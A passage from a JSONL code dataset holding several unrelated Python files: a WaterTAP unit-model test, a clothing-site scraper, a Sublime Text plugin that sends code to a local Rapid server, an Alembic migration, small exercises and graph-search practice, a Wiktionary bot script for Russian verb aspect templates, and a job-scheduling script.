reason=\"Solver not available\")\n @pytest.mark.component\n def test_conservation(self, model):\n for j in model.fs.params.component_list:\n assert 1e-6 >= abs(\n value(\n model.fs.unit.inlet.flow_mass_comp[0, j]\n + sum(\n model.fs.unit.generation_rxn_comp[0, r, j]\n for r in model.fs.unit.reaction_set\n )\n - model.fs.unit.treated.flow_mass_comp[0, j]\n - model.fs.unit.byproduct.flow_mass_comp[0, j]\n )\n )\n\n @pytest.mark.component\n def test_report(self, model):\n stream = StringIO()\n\n model.fs.unit.report(ostream=stream)\n\n output = \"\"\"\n====================================================================================\nUnit : fs.unit Time: 
0.0\n------------------------------------------------------------------------------------\n Unit Performance\n\n Variables: \n\n Key : Value : Fixed : Bounds\n Electricity Demand : 8.0000e-10 : False : (0, None)\n Electricity Intensity : 0.0000 : True : (None, None)\n Reaction Extent [cod_to_nonbiodegradable_cod] : 5.0313e-05 : False : (None, None)\n Solute Removal [ammonium_as_nitrogen] : 0.0000 : True : (0, None)\n Solute Removal [cod] : 0.0000 : True : (0, None)\n Solute Removal [nonbiodegradable_cod] : 1.0000 : True : (0, None)\n Solute Removal [phosphate_as_phosphorous] : 0.0000 : True : (0, None)\n Water Recovery : 0.39680 : True : (1e-08, 1.0000001)\n\n------------------------------------------------------------------------------------\n Stream Table\n Inlet Treated Byproduct\n Volumetric Flowrate 4.3750e-05 1.7374e-05 2.6376e-05\n Mass Concentration H2O 997.55 996.71 998.09\n Mass Concentration cod 2.3000 2.8958 3.0331e-05\n Mass Concentration nonbiodegradable_cod 2.2857e-16 4.6045e-05 1.9076\n Mass Concentration ammonium_as_nitrogen 0.10500 0.26444 3.0331e-05\n Mass Concentration phosphate_as_phosphorous 0.050000 0.12595 3.0331e-05\n====================================================================================\n\"\"\"\n\n assert output in stream.getvalue()\n\n\ndb = Database()\nparams = db._get_technology(\"anaerobic_mbr_mec\")\n\n\nclass Test_AnMBRMEC_ZO_subtype:\n @pytest.fixture(scope=\"class\")\n def model(self):\n m = ConcreteModel()\n\n m.fs = FlowsheetBlock(default={\"dynamic\": False})\n m.fs.params = WaterParameterBlock(\n default={\"solute_list\": [\"cod\", \"nonbiodegradable_cod\"]}\n )\n\n m.fs.unit = AnaerobicMBRMECZO(\n default={\"property_package\": m.fs.params, \"database\": db}\n )\n\n return m\n\n @pytest.mark.parametrize(\"subtype\", [params.keys()])\n @pytest.mark.component\n def test_load_parameters(self, model, subtype):\n model.fs.unit.config.process_subtype = subtype\n data = db.get_unit_operation_parameters(\"anaerobic_mbr_mec\", subtype=subtype)\n\n model.fs.unit.load_parameters_from_database()\n\n for (t, j), v in model.fs.unit.removal_frac_mass_solute.items():\n assert v.fixed\n assert v.value == data[\"removal_frac_mass_solute\"][j][\"value\"]\n\n\n@pytest.mark.unit\ndef test_ffCOD_not_in_solute_list():\n model = ConcreteModel()\n model.db = Database()\n\n model.fs = FlowsheetBlock(default={\"dynamic\": False})\n model.fs.params = WaterParameterBlock(default={\"solute_list\": [\"cod\"]})\n with pytest.raises(\n ValueError,\n match=\"nonbiodegradable_cod must be included in the solute list since\"\n \" this unit model converts cod to nonbiodegradable_cod.\",\n ):\n model.fs.unit = AnaerobicMBRMECZO(\n default={\"property_package\": model.fs.params, \"database\": model.db}\n )\n\n\n@pytest.mark.unit\ndef test_COD_not_in_solute_list():\n model = ConcreteModel()\n model.db = Database()\n\n model.fs = FlowsheetBlock(default={\"dynamic\": False})\n model.fs.params = WaterParameterBlock(\n default={\"solute_list\": [\"nonbiodegradable_cod\"]}\n )\n with pytest.raises(\n ValueError,\n match=\"fs.unit - key_reactant cod for reaction cod_to_nonbiodegradable_cod \"\n \"is not in the component list used by the assigned property package.\",\n ):\n model.fs.unit = AnaerobicMBRMECZO(\n default={\"property_package\": model.fs.params, \"database\": model.db}\n 
)\n","sub_path":"watertap/unit_models/zero_order/tests/test_anaerobic_mbr_mec_zo.py","file_name":"test_anaerobic_mbr_mec_zo.py","file_ext":"py","file_size_in_byte":11384,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"622769108","text":"# .-. coding=utf-8\nimport urllib2\nimport datetime\nfrom lxml import etree\nfrom kernel import collector\n\nLIST_URL = 'http://me-city.com/assets/collection-%s.xml'\nXPATH = '/Collection/Category/Product'\n\nclass CityMeCollector(collector.BaseCollector):\n display_name = \"CityMe\"\n\n def fetch(self):\n self.logger.info('City&Me started.')\n self.getData('women',u'女装') #女装\n self.getData('men',u'男装') #男装\n\n def getData(self, category, old_leibie):\n parser = etree.XMLParser(encoding='utf-8')\n self.logger.info('Category: %s:' % category)\n url = LIST_URL %(category)\n text = urllib2.urlopen(url).read()\n time = datetime.datetime.now().strftime('%Y-%m-%d')\n tree = etree.XML(text, parser=parser)\n nodes = tree.xpath(XPATH)\n for node in nodes:\n title = node.find('Title').text\n\n if u'内衣' in title or u'n内裤' in title or u'袜子' in title:\n continue\n\n if u'裙' in title:\n leibie = u'裙'\n elif u'裤' in title:\n leibie = u'裤'\n elif u'鞋' in title:\n leibie = u'鞋'\n elif u'包' in title:\n leibie = u'配饰'\n elif u'5239145' in title or u'装' in title or u'衣' in title or u'衫' in title\\\n or u'夹' in title or u'恤' in title:\n leibie = u'上装'\n else:\n continue\n\n\n price = node.find('Price').text\n\n image_url = u'http://me-city.com/'+node.find('FullImage').text\n\n\n self.logger.info('%s:%s(%s) - %s @ %s' % (leibie, title, price, image_url, image_url))\n collector.object_found.send(\n self,\n time = time, title = title, url = image_url,\n image_url = image_url,\n price = price,\n leibie = leibie\n )\n from shopping.signals import item_found\n item_found.send(\n self,\n name = title,\n url = image_url,\n brand = self.__class__.__name__,\n image_url = image_url,\n image_url2 = None,\n price = price,\n category = leibie,\n )\n","sub_path":"collectors/shopping/city_me.py","file_name":"city_me.py","file_ext":"py","file_size_in_byte":2317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"15556057","text":"import sublime, sublime_plugin\nimport socket\nimport time\nimport threading\nimport os\nimport subprocess\nimport re\n\nfrom .rapid_output import RapidOutputView\nfrom .rapid_parse import RapidSettings\nfrom .rapid_debug import *\n\n# to run execute from the console:\n# view.run_command('rapid_eval')\n\nclass RapidConnectionThread(threading.Thread):\n\tinstance = None\n\t\n\tdef __init__(self):\n\t\tself.host = \"localhost\"\n\t\tsettings = RapidSettings().getSettings()\n\t\tif \"Host\" in settings:\n\t\t\tself.host = settings[\"Host\"]\n\n\t\tself.port = 4444\n\t\tself.sock = None\n\t\tself.running = False\n\n\t\ttry:\n\t\t\tthreading.Thread.__init__(self)\n\t\t\tself.sock = socket.create_connection((self.host, self.port))\n\t\t\t#RapidOutputView.printMessage(\"Connected to \" + self.host + \".\")\n\t\t\tRapidConnectionThread.instance = self\n\t\texcept OSError as e:\n\t\t\tRapidOutputView.printMessage(\"Failed to connect to rapid server:\\n\" + str(e) + \"\\n\")\n\n\tdef run(self):\n\t\tself.running = True\n\t\tdataQueue = []\n\n\t\ttry:\n\t\t\twhile True:\n\t\t\t\t#data = self.sock.recv(1).decode()\n\t\t\t\t\n\t\t\t\tdata = self.sock.recv(1)\n\t\t\t\tdata = self.decodeData(data)\n\n\t\t\t\tif not data:\n\t\t\t\t\tbreak;\n\n\t\t\t\tif data != 
'\\000':\n\t\t\t\t\tdataQueue.append(data)\n\n\t\t\t\tif data == '\\n' or data == '\\000':\n\t\t\t\t\tif dataQueue: #dataQueue is not empty\n\t\t\t\t\t\tdatastr = \"\".join(dataQueue)\n\t\t\t\t\t\tself.receiveString(datastr)\n\t\t\t\t\tdel dataQueue[:]\n\t\texcept socket.error:\n\t\t\tRapidOutputView.printMessage(\"Socket error\")\n\t\texcept:\n\t\t\tRapidOutputView.printMessage(\"Error\")\n\n\t\tself.sock.close()\n\t\tself.running = False\n\t\tdel self.sock\n\t\tRapidOutputView.printMessage(\"Connection terminated\")\n\n\tdef decodeData(self, data):\n\t\t#avoid error if received data is non-ascii (print space instead)\n\t\ttry:\n\t\t\tchar = data.decode()\n\t\texcept UnicodeDecodeError:\n\t\t\tchar = \" \"\n\t\treturn char\n\n\tdef isRunning(self):\n\t\treturn self.running \n\n\tdef receiveString(self, msg):\n\t\t# called when a string is received from the app\n\t\t#print(\"received: \" + msg)\n\n\t\t# process debug commands\n\t\tif msg.startswith(\"#\"):\n\t\t\tRapidDebug.execDebugCommand(msg)\n\n\t\tRapidOutputView.printMessage(msg)\n\n\tdef sendString(self, msg):\n\t\t#ignore non-ascii characters when sending\n\t\t#msg = msg.encode('ascii', 'ignore')\n\t\t\n\t\tself.sock.send(msg.encode())\n\n\t@staticmethod\n\tdef checkConnection():\n\t\tif RapidConnectionThread.instance == None:\n\t\t\tRapidConnect()\n\t\t\tRapidConnectionThread().start()\n\t\telif not RapidConnectionThread.instance.isRunning():\n\t\t\tRapidConnectionThread.instance.join()\n\t\t\tRapidConnect()\n\t\t\tRapidConnectionThread().start()\n\nclass RapidResumeCommand(sublime_plugin.TextCommand):\n\tdef run(self, edit):\n\t\tRapidConnectionThread.checkConnection()\n\t\tRapidConnectionThread.instance.sendString(\"\\nsys.resume()\\000\")\n\nclass RapidHelpCommand(sublime_plugin.TextCommand):\n\tdef run(self, edit):\n\t\tcursor_pos = self.view.sel()[0].begin()\n\t\tregion = self.view.word(cursor_pos)\n\t\tword = self.view.substr(region)\n\t\t#print(\"Sending word: \" + word)\n\t\tRapidConnectionThread.checkConnection()\n\t\tline = \"\\nrequire(\\\"doc\\\"); doc.find([[\"+ word +\"]])\\000\"\n\t\tRapidConnectionThread.instance.sendString(line)\n\nclass RapidEvalCommand(sublime_plugin.TextCommand):\n\tdef run(self, edit):\n\n\t\t#do not evaluate python files\n\t\tif self.view.file_name() != None and self.view.file_name().endswith(\"py\"):\n\t\t\tprint(\"cannot evaluate python files\")\n\t\t\treturn\n\n\t\tRapidConnectionThread.checkConnection()\n\t\tline_contents = self.getLines()\n\t\tRapidConnectionThread.instance.sendString(line_contents)\n\n\t# Checks if the cursor is inside a Lua function() block\n\tdef checkBlock(self, view, current_row, line_contents, cursor_pos):\n\t\t#added special case check for comments inside a block which might have no indentation\n\t\tif self.view.indentation_level(cursor_pos) > 0 \\\n\t\tor ( self.view.indentation_level(cursor_pos) == 0 \\\n\t\tand line_contents.startswith(\"--\") ):\n\t\t\treturn True\n\t\telif line_contents.strip() == '':\n\t\t\t# cursor might be on an empty unindented row inside the block\n\t\t\tstart_row = current_row\n\t\t\tend_row = current_row\n\t\t\tindex = 1\n\n\t\t\t# find first previous non-empty row\n\t\t\tblock_start = False\n\t\t\twhile not block_start:\n\t\t\t\tstart_row = current_row - index\n\t\t\t\tstart_pos = self.view.text_point(start_row, 0)\n\t\t\t\tstart_line = self.view.full_line(start_pos)\n\t\t\t\tstart_line_contents = self.view.substr(start_line)\n\t\t\t\tif start_line_contents.strip() != '':\n\t\t\t\t\tblock_start = True\n\t\t\t\telse:\n\t\t\t\t\tindex = index 
+ 1\n\n\t\t\t#find first next non-empty row\n\t\t\tindex = 1\n\t\t\tblock_end = False\n\t\t\twhile not block_end:\n\t\t\t\tend_row = current_row + index\n\t\t\t\tend_pos = self.view.text_point(end_row, 0)\n\t\t\t\tend_line = self.view.full_line(end_pos)\n\t\t\t\tend_line_contents = self.view.substr(end_line)\n\t\t\t\tif end_line_contents.strip() != '':\n\t\t\t\t\tblock_end = True\n\t\t\t\telse:\n\t\t\t\t\tindex = index + 1\n\n\t\t\t# Assume that the cursor is inside a function block if:\n\t\t\t# 1) start_row and end_row have indentation level > 0 OR\n\t\t\t# 2) start_row has indentation level > 0 and end_row starts with \"end\" OR\n\t\t\t# 3) start_row starts with \"function\" or \"local function\" and end_row indentation level > 0\n\t\t\tif (self.view.indentation_level(start_pos) > 0 and self.view.indentation_level(end_pos) > 0):\n\t\t\t\treturn True\n\t\t\telif (self.view.indentation_level(start_pos) > 0 \\\n\t\t\t\tand self.view.indentation_level(end_pos) == 0 and end_line_contents.startswith(\"end\")):\n\t\t\t\treturn True\n\t\t\telif (self.view.indentation_level(start_pos) == 0 and self.view.indentation_level(end_pos) > 0) \\\n\t\t\t\tand (start_line_contents.startswith(\"function\") or start_line_contents.startswith(\"local function\")):\n\t\t\t\treturn True\n\t\t\telse:\n\t\t\t\treturn False\n\t\telse:\n\t\t\treturn False\n\n\tdef getLines(self):\n\t\tfor region in self.view.sel():\n\t\t\tcursor_pos = self.view.sel()[0].begin()\n\t\t\tcurrent_row = self.view.rowcol(cursor_pos)[0]\n\n\t\t\tif region.empty():\n\t\t\t\t#check if we are evaluating a block instead of line\n\t\t\t\tline = self.view.full_line(region)\n\t\t\t\tline_contents = self.view.substr(line)\n\t\t\t\t\n\t\t\t\t# if self.view.indentation_level(cursor_pos) > 0 \\\n\t\t\t\t# or ( self.view.indentation_level(cursor_pos) == 0 \\\n\t\t\t\t# and line_contents.startswith(\"--\") ):\n\n\t\t\t\t#eval block\n\t\t\t\tif self.checkBlock(self.view, current_row, line_contents, cursor_pos) == True:\n\t\t\t\t\tstart_row = current_row\n\t\t\t\t\tend_row = current_row\n\t\t\t\t\tindex = 1\n\n\t\t\t\t\t#find start of the block\n\t\t\t\t\tblock_start = False\n\t\t\t\t\twhile not block_start:\n\t\t\t\t\t\tstart_row = current_row - index\n\t\t\t\t\t\tstart_pos = self.view.text_point(start_row, 0)\n\t\t\t\t\t\tstart_line = self.view.full_line(start_pos)\n\t\t\t\t\t\tstart_line_contents = self.view.substr(start_line)\n\t\t\t\t\t\tif self.view.indentation_level(start_pos) == 0 \\\n\t\t\t\t\t\tand\tstart_line_contents.strip() != '' \\\n\t\t\t\t\t\tand\tnot start_line_contents.startswith(\"--\"):\n\t\t\t\t\t\t\tblock_start = True\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tindex = index + 1\n\n\t\t\t\t\t#find end of the block\n\t\t\t\t\tindex = 1\n\t\t\t\t\tblock_end = False\n\t\t\t\t\twhile not block_end:\n\t\t\t\t\t\tend_row = current_row + index\n\t\t\t\t\t\tend_pos = self.view.text_point(end_row, 0)\n\t\t\t\t\t\tend_line = self.view.full_line(end_pos)\n\t\t\t\t\t\tend_line_contents = self.view.substr(end_line)\n\t\t\t\t\t\tif self.view.indentation_level(end_pos) == 0 \\\n\t\t\t\t\t\tand end_line_contents.strip() != '' \\\n\t\t\t\t\t\tand not end_line_contents.startswith(\"--\"):\n\t\t\t\t\t\t\tblock_end = True\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tindex = index + 1\n\t\t\t\t\t\n\t\t\t\t\tstart_offset = self.view.text_point(start_row, 0)\n\t\t\t\t\tend_offset = self.view.text_point(end_row+1, 0)\n\t\t\t\t\tblock_region = sublime.Region(start_offset, end_offset)\n\t\t\t\t\tline = self.view.full_line(block_region)\n\n\t\t\t\t\tfile_row = 
start_row\n\t\t\t\t\t#print(\"Sending: \" + str(file_row))\n\t\t\t\t\tmsg = \"Updating \" + start_line_contents\n\t\t\t\t\tRapidOutputView.printMessage(msg)\n\t\t\t\t\tfile_row_str = str(file_row + 1)\n\t\t\t\telse:\n\t\t\t\t\tline = self.view.line(region) #expand the region for full line if no selection\n\t\t\t\t\tfile_row_str = str(current_row + 1)\n\t\t\telse:\n\t\t\t\tline = region #get only the selected area\n\t\t\t\tfile_row_str = str(current_row + 1)\n\n\t\t\tfile_name = self.view.file_name() or \"\"\n\t\t\t\n\t\t\tif len(file_name) > 0:\n\t\t\t\t# we always want to send only relative paths if possible, so\n\t\t\t\t# try to convert the filename to a relative path\n\t\t\t\tfor window in sublime.windows():\n\t\t\t\t\tfor folder in window.folders():\n\t\t\t\t\t\tif file_name.startswith(folder):\n\t\t\t\t\t\t\tfile_name = os.path.relpath(file_name, folder)\n\n\t\t\t# replace possible backslashes with forward ones\n\t\t\tfile_name = file_name.replace(\"\\\\\", \"/\")\n\n\t\t\tline_str = self.view.substr(line)\n\t\t\tline_contents = \"@\" + file_name + \":\" + file_row_str + \"\\n\" + line_str + \"\\000\"\n\t\t\t\n\t\t\t#print(\"------\")\n\t\t\t#print(\"Sending: \", file_name)\n\t\t\t#print(\"Sending contents:\")\n\t\t\t#print(line_contents)\n\t\t\t#print(\"------\")\n\t\t\treturn line_contents\n\nclass RapidCheckServerAndStartupProjectCommand(sublime_plugin.WindowCommand):\n\tdef run(self):\n\t\tself.view = self.window.active_view()\n\t\tself.view.run_command('rapid_output_view_clear')\n\n\t\t#Check if startup project exists and if it has been modified\n\t\tstartup_exists = False\n\t\tis_modified = False\n\n\t\t#RapidOutputView.printMessage(\"Loading project settings...\")\n\t\tstartup_path = RapidSettings().getStartupFilePath()\n\t\tRapidOutputView.printMessage(\"Startup path: \" + startup_path)\n\n\t\tif startup_path:\n\t\t\tstartup_exists = True\n\t\t\tnew_view = sublime.active_window().find_open_file(startup_path)\n\t\t\tif new_view != None and new_view.is_dirty():\n\t\t\t\tis_modified = True\n\t\telif self.view.is_dirty():\n\t\t\tis_modified = True\n\n\t\t#Send commands to server accordingly\n\t\tRapidConnectionThread.checkConnection()\n\t\tif startup_exists:\n\t\t\t#always load project, even if it is open and modified (modifications are loaded only after saving)\n\t\t\tRapidOutputView.printMessage(\"Startup project: \" + startup_path)\n\t\t\tline = \"\\nsys.loadProject([[\" + startup_path + \"]])\\000\"\n\t\t\tRapidConnectionThread.instance.sendString(line)\n\t\telse:\n\t\t\t#if no startup project, run current page\n\t\t\tif is_modified:\n\t\t\t\t#file has not been saved - restart runtime engine and send code over\n\t\t\t\tRapidConnectionThread.instance.sendString(\"\\nsys.restart()\\000\")\n\t\t\t\tline = \"@\" + self.view.file_name() + \":1\\n\" + self.view.substr(sublime.Region(0, self.view.size())) + \"\\000\"\n\t\t\t\tRapidConnectionThread.instance.sendString(line)\n\t\t\telse:\n\t\t\t\t#file is up to date -> reload file - this is faster than sending the code\n\t\t\t\tRapidConnectionThread.instance.sendString(\"\\nsys.loadProject([[\" + self.view.file_name() + \"]])\\000\")\n\nclass RapidConnect():\n\tdef __init__(self):\n\t\n\t\t#print(\"rapidconnect\")\n\n\t\t#rapid_exe = sublime.active_window().active_view().settings().get(\"RapidExe\")\n\t\tsettings = RapidSettings().getSettings()\n\t\trapid_exe = settings[\"RapidExe\"]\n\n\t\tif os.name == \"nt\":\n\t\t\t# check if rapid is already running\t\n\t\t\trapid_running = True\n\t\t\trapid = subprocess.check_output(\"tasklist 
/FI \\\"IMAGENAME eq \" + rapid_exe + \".exe\\\" /FO CSV\")\n\t\t\trapid_search = re.search(rapid_exe + \".exe\", rapid.decode(\"ISO-8859-1\"))\n\t\t\tif rapid_search == None:\n\t\t\t\trapid_debug = subprocess.check_output(\"tasklist /FI \\\"IMAGENAME eq \" + rapid_exe + \"_d.exe\\\" /FO CSV\")\n\t\t\t\trapid_debug_search = re.search(rapid_exe + \"_d.exe\", rapid_debug.decode(\"ISO-8859-1\"))\n\t\t\t\tif rapid_debug_search == None:\n\t\t\t\t\trapid_running = False\n\t\t\tif rapid_running:\n\t\t\t\treturn\t\n\t\telif os.name == \"posix\":\n\t\t\tdata = subprocess.Popen(['ps','aux'], stdout=subprocess.PIPE).stdout.readlines() \n\t\t\trapid_running = False\n\t\t\tfor line in data:\n\t\t\t\tlineStr = line.decode(\"utf-8\")\n\t\t\t\tif lineStr.find(rapid_exe) > -1 and lineStr.find(os.getlogin()) > -1:\n\t\t\t\t\tprint(\"Rapid executable is already running for user: \" + os.getlogin())\n\t\t\t\t\tprint(lineStr)\n\t\t\t\t\trapid_running = True\n\t\t\t\t\tbreak\n\t\t\tif rapid_running:\n\t\t\t\treturn\n\n\t\tif \"Host\" in settings and settings[\"Host\"] != \"localhost\":\n\t\t\treturn\n\n\t\tif os.name == \"nt\":\n\t\t\trapid_path = settings[\"RapidPathWin\"]\n\t\telif os.name == \"posix\":\n\t\t\tos.chdir(RapidSettings().getStartupProjectPath()) \n\t\t\trapid_path = os.path.realpath(settings[\"RapidPathOSX\"])\n\t\telse:\n\t\t\tRapidOutputView.printMessage(\"Could not find \\\"RapidPath\\\" variable from projects' rapid_sublime -file!\")\n\t\t\treturn\n\n\t\tif rapid_path != None and rapid_exe != None:\n\t\t\tRapidOutputView.printMessage(\"Starting \" + rapid_exe)\n\t\t\tfull_path = os.path.abspath(os.path.join(rapid_path, rapid_exe))\n\t\t\tsubprocess.Popen(full_path, cwd=rapid_path)\n\t\t\tif os.name == \"posix\":\n\t\t\t\ttime.sleep(0.5) #small delay to get server running on OSX\n\t\telse:\n\t\t\tRapidOutputView.printMessage(\"Could not start server executable!\")\n\t\t\tRapidOutputView.printMessage(\"\\\"RapidPath\\\" and/or \\\"RapidExe\\\" variables not found from \\\"Preferences.sublime_settings\\\" file!\")\n\nclass RapidTestCommand(sublime_plugin.TextCommand):\n\tdef run(self, edit):\n\t\tdata = subprocess.Popen(['ps','aux'], stdout=subprocess.PIPE).stdout.readlines() \n\t\t#print(data)\n\t\trapid_running = False\n\t\tfor line in data:\n\t\t\tlineStr = line.decode(\"utf-8\")\n\t\t\tif lineStr.find(\"rapid\") > -1:\n\t\t\t\trapid_running = True\n\t\t\t\tbreak\n\t\tif rapid_running:\n\t\t\tprint(\"rapid is already running!\")\n\t\telse:\n\t\t\tprint(\"rapid is not running!\")\n","sub_path":"rapid.py","file_name":"rapid.py","file_ext":"py","file_size_in_byte":12787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"181391306","text":"\"\"\"create user table\n\nRevision ID: cae034c85106\nRevises: \nCreate Date: 2016-12-14 10:10:01.051407\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = 'cae034c85106'\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\nimport datetime\n\nfrom alembic import op\nimport sqlalchemy as sa\n\n\ndef upgrade():\n op.create_table(\n 'users',\n sa.Column('id', sa.Integer, primary_key=True, autoincrement=True),\n sa.Column('name', sa.String(20), nullable=False),\n sa.Column('passwd', sa.String(64), nullable=False),\n sa.Column('salt', sa.String(50), nullable=False),\n sa.Column('email', sa.String(50), nullable=False),\n sa.Column('create_at', sa.DateTime, default=datetime.datetime.utcnow),\n sa.Column('actived', sa.Boolean, default=False)\n )\n\ndef downgrade():\n 
op.drop_table('users')\n","sub_path":"iot/model/migration/alembic_migrations/versions/cae034c85106_create_user_table.py","file_name":"cae034c85106_create_user_table.py","file_ext":"py","file_size_in_byte":847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"470657984","text":"\"\"\"\r\n\n\nCreate a function that takes a string and returns the **sum of vowels** ,\nwhere some vowels are considered numbers.\n\nVowel| Number \n---|--- \nA| 4 \nE| 3 \nI| 1 \nO| 0 \nU| 0 \n \n### Examples\n\n    sum_of_vowels(\"Let\\'s test this function.\") ➞ 8\n    \n    sum_of_vowels(\"Do I get the correct output?\") ➞ 10\n    \n    sum_of_vowels(\"I love edabit!\") ➞ 12\n\n### Notes\n\nVowels are case-insensitive ( _e.g. A = 4 and a = 4_ ).\n\n\"\"\"\r\n\ndef sum_of_vowels(sentence):\n    total = 0\n    point = {'a' : 4, 'e' : 3, 'i' : 1, 'o' : 0, 'u' : 0}\n    vowels = ['a', 'e', 'i', 'o', 'u']\n    sentence = sentence.lower()\n    for x in sentence:\n        if x in vowels:\n            total += point[x]\n    return total\n\n","sub_path":"6NoaFGKJgRW6oXhLC_12.py","file_name":"6NoaFGKJgRW6oXhLC_12.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"23807826","text":"\"\"\" Practice Implementing Graph Algorithms \"\"\"\nimport queue\nimport graph\nimport collections\n\n\ndef depth_first_search(node, visited=None):\n    \"\"\" Mimics a DFS traversal by printing the node names \"\"\"\n    if node is None:\n        return\n    if visited is None:\n        # build the visited map here instead of as a mutable default argument,\n        # which would be shared between separate top-level calls\n        visited = collections.defaultdict(bool)\n    print(node.name)\n    visited[node.name] = True\n    for n in node.nodes:\n        if not visited[n.name]:\n            depth_first_search(n, visited)\n\ndef breadth_first_search(node):\n    \"\"\" Mimics a BFS traversal by printing the node names \"\"\"\n    if node is None:\n        return\n    visited = collections.defaultdict(bool)\n    Q = queue.Queue(0)\n    Q.put(node)\n    visited[node.name] = True\n\n    while (not Q.empty()):\n        # dequeue the first item\n        cur_node = Q.get()\n        print(cur_node.name)\n        for n in cur_node.nodes:\n            if not visited[n.name]:\n                visited[n.name] = True\n                Q.put(n)\n\n\nif __name__ == '__main__':\n    # Create a graph in CTCI pg. 
107\n ug = graph.DirectedGraph()\n\n node_0 = graph.Node(0)\n node_1 = graph.Node(1)\n node_2 = graph.Node(2)\n node_3 = graph.Node(3)\n node_4 = graph.Node(4)\n node_5 = graph.Node(5)\n\n node_0.nodes = [node_1, node_4, node_5]\n node_1.nodes = [node_3, node_4]\n node_2.nodes = [node_1]\n node_3.nodes = [node_2, node_4]\n\n print('DFS order:')\n depth_first_search(node_0)\n print('BFS order:')\n breadth_first_search(node_0)","sub_path":"python/practice/graph_search.py","file_name":"graph_search.py","file_ext":"py","file_size_in_byte":1413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"463065190","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n# Reformat corresponding (im)perfective specs using {{pf}} or {{impf}}\n\nimport pywikibot, re, sys, argparse\n\nimport blib\nfrom blib import getparam, rmparam, msg, errmsg, site\n\ndef process_page(page, index, parsed):\n pagetitle = str(page.title())\n subpagetitle = re.sub(\"^.*:\", \"\", pagetitle)\n def pagemsg(txt):\n msg(\"Page %s %s: %s\" % (index, pagetitle, txt))\n def errpagemsg(txt):\n msg(\"Page %s %s: %s\" % (index, pagetitle, txt))\n errmsg(\"Page %s %s: %s\" % (index, pagetitle, txt))\n\n pagemsg(\"Processing\")\n\n if \":\" in pagetitle:\n pagemsg(\"WARNING: Colon in page title, skipping page\")\n return\n\n text = str(page.text)\n notes = []\n\n foundrussian = False\n sections = re.split(\"(^==[^=]*==\\n)\", text, 0, re.M)\n\n for j in range(2, len(sections), 2):\n if sections[j-1] == \"==Russian==\\n\":\n if foundrussian:\n pagemsg(\"WARNING: Found multiple Russian sections, skipping page\")\n return\n foundrussian = True\n\n # Try to convert multi-line usex using #:\n def generate_new_format_corverb(m):\n pfimpf = m.group(1)\n verbtext = m.group(2)\n verbs = re.split(\" *(?:,|or) *\", verbtext)\n newverbs = []\n for index, verb in enumerate(verbs):\n qual = \"\"\n if \"only\" in verb:\n verb = re.sub(\" *only *\", \"\", verb)\n qual = \"only\"\n if \"also\" in verb:\n verb = re.sub(\" *also *\", \"\", verb)\n qual = \"also\"\n if \"{{i|low colloquial}} \" in verb:\n verb = re.sub(r\" *\\{\\{i\\|low colloquial\\}\\} *\", \"\", verb)\n qual = \"low colloquial\"\n if qual:\n qual = \"|q%s=%s\" % (index + 1, qual)\n m = re.search(r\"^\\[\\[(.*)\\]\\]$\", verb)\n if m:\n newverbs.append(m.group(1) + qual)\n continue\n m = re.search(r\"^\\{\\{[ml]\\|ru\\|(.*)\\}\\}$\", verb)\n if m:\n newverbs.append(m.group(1) + qual)\n continue\n pagemsg(\"WARNING: Unable to parse verb spec %s, treating as raw\" % verb)\n newverbs.append(verb + qual)\n return \"\\n#: {{%s|ru|%s}}\\n\" % (pfimpf, \"|\".join(newverbs))\n sections[j] = re.sub(r\", *\\{\\{g\\|(pf|impf)\\}\\} *[-–—:] * (.*)\\n\",\n generate_new_format_corverb, sections[j])\n # Repeatedly move {{pf}}/{{impf}} after usexes\n while True:\n replacement = re.sub(r\"\\n(#: \\{\\{(?:pf|impf)\\|.*?\\}\\}.*\\n)(#\\*?: \\{\\{ux.*?\\}\\}.*\\n)\",\n r\"\\n\\2\\1\", sections[j])\n if replacement == sections[j]:\n break\n sections[j] = replacement\n if \"{{g|pf}}\" in sections[j] or \"{{g|impf}}\" in sections[j]:\n errpagemsg(\"WARNING: Found unconverted {{g|pf}} or {{g|impf}}\")\n if \" pf\" in sections[j] or \" impf\" in sections[j]:\n errpagemsg(\"WARNING: Found unconverted pf or impf following a space\")\n\n return \"\".join(sections), \"Reformat Russian perfective/imperfective correspondences to use {{pf}}/{{impf}}\"\n\nparser = blib.create_argparser(\"Reformat corresponding (im)perfective specs using {{pf}} or {{impf}}\",\n 
include_pagefile=True)\nargs = parser.parse_args()\nstart, end = blib.parse_start_end(args.start, args.end)\n\nblib.do_pagefile_cats_refs(args, start, end, process_page, edit=True,\n default_cats=[\"Russian verbs\"])\n","sub_path":"reformat_pf_impf.py","file_name":"reformat_pf_impf.py","file_ext":"py","file_size_in_byte":3299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"593798380","text":"import operator\n\nf=open(\"jobs.txt\",\"r\")\nmaxweight=0\ncount=0\nno=0\njobs=[]\nfor line in f:\n line=line.rstrip(\"\\n\")\n if(count==0):\n no=int(line)\n else:\n lw,hw=map(int,line.split())\n jobs.append([lw,hw,lw/hw])\n count+=1\n\njobs=sorted(jobs,key=operator.itemgetter(2))\njobs = jobs[-1::-1]\nsumTime = 0\nsumLength = 0 \nfor job in jobs:\n sumLength += job[1]\n sumTime += job[0] * sumLength\nprint(sumTime)\n","sub_path":"Week-1/scheduling2.py","file_name":"scheduling2.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"407490856","text":"from ple.games.catcher import Catcher\nfrom ple import PLE\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport random\nclass 